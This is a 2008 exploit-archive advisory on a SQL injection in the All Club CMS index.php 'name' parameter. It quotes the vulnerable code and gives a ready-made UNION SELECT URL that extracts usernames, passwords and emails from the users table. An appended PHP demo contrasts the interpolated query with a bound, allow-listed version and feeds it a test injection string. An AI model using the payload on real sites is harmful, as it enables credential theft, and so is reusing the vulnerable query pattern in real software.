-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
All Club CMS <= 0.0.1f index.php Remote SQL Injection Vulnerability
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


bug found by ka0x
D.O.M TEAM 2008
we are: ka0x, an0de, xarnuz
http://www.domlabs.org/

Script affected: All Club CMS
Vulnerability: Remote SQL Injection

Download: http://sourceforge.net/project/showfiles.php?group_id=209058
Requires magic_quotes_gpc = off


vuln code:

[...]

if (isset($_GET['name']) && (!(empty($_GET['name'])))) {

    $name = $_GET['name'];
    $name = stripslashes($name);
    // stop hackers
    if (eregi("http\:\/\/", $name)) {
        echo "<br /> No go on the hack attempt.<br />";
        // log attempt, from IP, etc.
        if ($SYS_SET['ban_attack_ip']) {
            // ban ip if ban_attack_ip
        }
        die();
    }

    $sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");

[...]


The stripslashes function only removes backslashes (\); doubled
backslashes (\\) become a single backslash (\).


Exploit:
http://[host]/accms_path/index.php?name=-1'/**/union/**/select/**/1,concat(account,0x3a,password,0x3a,email),3,4,5,6,7,8,9,1,1,1,1/**/from/**/accms_users/**/where/**/id=1/*


__EOF__

# milw0rm.com [2008-02-05]
All Club CMS 0.0.2 index.php Remote SQL Injection Vulnerability ka0x 02/05/2008
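
The excerpt passes a string with $name already interpolated to prepare(), so no parameter is ever bound and the "http://" check is the only filtering applied. The following is an added example, not All Club CMS code and not from the advisory's authors, contrasting that pattern with a bound placeholder. It assumes $dbh is a PDO handle; the in-memory SQLite table, its rows, the function names and the module-name allow-list format are constructed for illustration.

```php
<?php
// Added example, not All Club CMS code. Assumption: $dbh is a PDO handle.
// The in-memory table and its rows are constructed sample data.
$dbh = new PDO('sqlite::memory:');
$dbh->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$dbh->exec("CREATE TABLE accms_modules (id INTEGER PRIMARY KEY, name TEXT)");
$dbh->exec("INSERT INTO accms_modules (name) VALUES ('news'), ('forum')");

// Pattern from the advisory: the value is already inside the SQL text when
// prepare() sees it, so a quote in $name closes the string literal.
function lookup_interpolated(PDO $dbh, string $name): array
{
    $sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name='$name'");
    $sth->execute();
    return $sth->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened form: allow-list the expected module-name format (assumed here to
// be letters, digits and underscore), then bind the value to a placeholder
// so it is only ever compared as data.
function lookup_bound(PDO $dbh, string $name): array
{
    if (!preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $name)) {
        return [];
    }
    $sth = $dbh->prepare("SELECT * FROM accms_modules WHERE name = :name");
    $sth->execute([':name' => $name]);
    return $sth->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed inputs: a normal module name, and a value containing a quote.
foreach (['news', "x' OR '1'='1"] as $name) {
    printf(
        "%-16s interpolated=%d row(s)  bound=%d row(s)\n",
        $name,
        count(lookup_interpolated($dbh, $name)),
        count(lookup_bound($dbh, $name))
    );
}
```

Through the interpolated path the quote-containing value matches every row in the table, while the bound path returns none for it. Binding the parameter is the fix; the allow-list is an additional check on top of it.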